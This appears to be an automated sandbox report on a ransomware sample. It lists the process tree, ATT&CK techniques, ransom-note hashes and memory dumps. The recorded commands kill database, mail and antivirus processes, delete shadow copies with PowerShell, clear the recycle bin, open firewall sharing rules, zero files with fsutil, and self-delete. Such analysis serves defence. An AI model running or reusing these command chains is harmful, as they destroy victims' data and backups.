- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM agntsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1468
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM PccNTMon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:616
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM thebat64.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1160
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM CNTAoSMgr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:544
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM msaccess.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1608
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM thebat.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:328
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqlwriter.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:988
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM ocomm.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:952
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM steam.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1636
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM outlook.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:932
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM tbirdconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:924
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM tmlisten.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1340
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" IM thunderbird.exe /F
  2⤵
  - Kills process with taskkill
  PID:1508
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM infopath.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2036
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM dbsnmp.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1600
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mbamtray.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1632
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM wordpad.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1296
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM msftesql.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1668
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM xfssvccon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1624
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM zoolz.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1840
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM powerpnt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:560
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mysqld-opt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1764
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM ocautoupds.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2032
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1648
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM ocssd.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1288
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM visio.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1072
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM oracle.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1060
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1644
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM winword.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1100
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqlagent.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1028
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mysqld-nt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1148
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqlbrowser.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1244
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqlservr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1952
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1972
- C:\Windows\system32\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
  2⤵
  PID:760
- C:\Windows\system32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:636
- C:\Windows\system32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
  2⤵
  PID:1012
- C:\Windows\system32\arp.exe
  "arp" -a
  2⤵
  PID:1644
- C:\Windows\System32\mshta.exe
  "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
  2⤵
  - Modifies Internet Explorer settings
  PID:2032
- C:\Windows\system32\cmd.exe
  "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
  2⤵
  PID:1160
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.7 -n 3
    3⤵
    - Runs ping.exe
    PID:664
- - C:\Windows\system32\fsutil.exe
    fsutil file setZeroData offset=0 length=524288 “%s”
    3⤵
    PID:1168
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\e1f063d6_by_Libranalysis.exe
  2⤵
  - Deletes itself
  PID:704
- - C:\Windows\system32\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    PID:1644

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "177189249013918887632054457611-15276065742062432051-156087160084169769-2018128497"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1540

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "49292760911824047601713768551-13609149652138848815234813462-1354040014-1576991462"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1752

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Winlogon Helper DLL

T1004

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta

MD5
bd83d7acf35b1d2600a50c69b0297c3a

SHA1
bfd7ed0c87234c1fae1b14b3058b27d44dececd5

SHA256
d822b8c34cc9c79de300785e68db26a7335676ea3eea3dc60cbc903513ea0039

SHA512
18aa49a7b5928fbbef080f667dcf5f8c14926a5c72a814d009ff4318f7d0b01f6c145caec076926935ba798694cda4455b6a7dbe643ba1691845969d4e2cf2f2

Download Submit
memory/304-91-0x0000000000000000-mapping.dmp

Download
memory/328-74-0x0000000000000000-mapping.dmp

Download
memory/328-99-0x0000000000000000-mapping.dmp

Download
memory/364-83-0x0000000000000000-mapping.dmp

Download
memory/544-97-0x0000000000000000-mapping.dmp

Download
memory/544-64-0x0000000000000000-mapping.dmp

Download
memory/560-114-0x0000000000000000-mapping.dmp

Download
memory/616-94-0x0000000000000000-mapping.dmp

Download
memory/636-68-0x0000000000000000-mapping.dmp

Download
memory/664-93-0x0000000000000000-mapping.dmp

Download
memory/760-135-0x0000000000000000-mapping.dmp

Download
memory/772-67-0x0000000000000000-mapping.dmp

Download
memory/864-80-0x0000000000000000-mapping.dmp

Download
memory/876-63-0x0000000000000000-mapping.dmp

Download
memory/924-104-0x0000000000000000-mapping.dmp

Download
memory/932-70-0x0000000000000000-mapping.dmp

Download
memory/932-103-0x0000000000000000-mapping.dmp

Download
memory/952-101-0x0000000000000000-mapping.dmp

Download
memory/960-92-0x0000000000000000-mapping.dmp

Download
memory/988-100-0x0000000000000000-mapping.dmp

Download
memory/1028-123-0x0000000000000000-mapping.dmp

Download
memory/1060-120-0x0000000000000000-mapping.dmp

Download
memory/1072-119-0x0000000000000000-mapping.dmp

Download
memory/1100-122-0x0000000000000000-mapping.dmp

Download
memory/1120-75-0x0000000000000000-mapping.dmp

Download
memory/1148-124-0x0000000000000000-mapping.dmp

Download
memory/1160-96-0x0000000000000000-mapping.dmp

Download
memory/1244-125-0x0000000000000000-mapping.dmp

Download
memory/1244-71-0x0000000000000000-mapping.dmp

Download
memory/1244-76-0x000007FEFB6A1000-0x000007FEFB6A3000-memory.dmp

Filesize
8KB

Download
memory/1288-118-0x0000000000000000-mapping.dmp

Download
memory/1296-111-0x0000000000000000-mapping.dmp

Download
memory/1296-69-0x0000000000000000-mapping.dmp

Download
memory/1316-85-0x0000000000000000-mapping.dmp

Download
memory/1340-107-0x0000000000000000-mapping.dmp

Download
memory/1340-86-0x0000000000000000-mapping.dmp

Download
memory/1468-95-0x0000000000000000-mapping.dmp

Download
memory/1508-106-0x0000000000000000-mapping.dmp

Download
memory/1540-90-0x0000000000000000-mapping.dmp

Download
memory/1600-108-0x0000000000000000-mapping.dmp

Download
memory/1600-81-0x0000000000000000-mapping.dmp

Download
memory/1608-79-0x0000000000000000-mapping.dmp

Download
memory/1608-98-0x0000000000000000-mapping.dmp

Download
memory/1624-112-0x0000000000000000-mapping.dmp

Download
memory/1632-109-0x0000000000000000-mapping.dmp

Download
memory/1636-102-0x0000000000000000-mapping.dmp

Download
memory/1640-78-0x0000000000000000-mapping.dmp

Download
memory/1644-121-0x0000000000000000-mapping.dmp

Download
memory/1648-117-0x0000000000000000-mapping.dmp

Download
memory/1652-60-0x0000000000A60000-0x0000000000A61000-memory.dmp

Filesize
4KB

Download
memory/1652-62-0x000000001B020000-0x000000001B022000-memory.dmp

Filesize
8KB

Download
memory/1668-110-0x0000000000000000-mapping.dmp

Download
memory/1752-89-0x0000000000000000-mapping.dmp

Download
memory/1764-115-0x0000000000000000-mapping.dmp

Download
memory/1792-77-0x0000000000000000-mapping.dmp

Download
memory/1796-65-0x0000000000000000-mapping.dmp

Download
memory/1804-82-0x0000000000000000-mapping.dmp

Download
memory/1840-66-0x0000000000000000-mapping.dmp

Download
memory/1840-113-0x0000000000000000-mapping.dmp

Download
memory/1876-72-0x0000000000000000-mapping.dmp

Download
memory/1896-88-0x0000000000000000-mapping.dmp

Download
memory/1952-126-0x0000000000000000-mapping.dmp

Download
memory/1972-129-0x0000000002350000-0x0000000002351000-memory.dmp

Filesize
4KB

Download
memory/1972-127-0x0000000000000000-mapping.dmp

Download
memory/1972-87-0x0000000000000000-mapping.dmp

Download
memory/1972-130-0x000000001ADE0000-0x000000001ADE1000-memory.dmp

Filesize
4KB

Download
memory/1972-131-0x000000001AC50000-0x000000001AC52000-memory.dmp

Filesize
8KB

Download
memory/1972-132-0x000000001AC54000-0x000000001AC56000-memory.dmp

Filesize
8KB

Download
memory/1972-133-0x00000000024D0000-0x00000000024D1000-memory.dmp

Filesize
4KB

Download
memory/1972-134-0x0000000002500000-0x0000000002501000-memory.dmp

Filesize
4KB

Download
memory/2032-116-0x0000000000000000-mapping.dmp

Download
memory/2036-73-0x0000000000000000-mapping.dmp

Download
memory/2036-105-0x0000000000000000-mapping.dmp

Download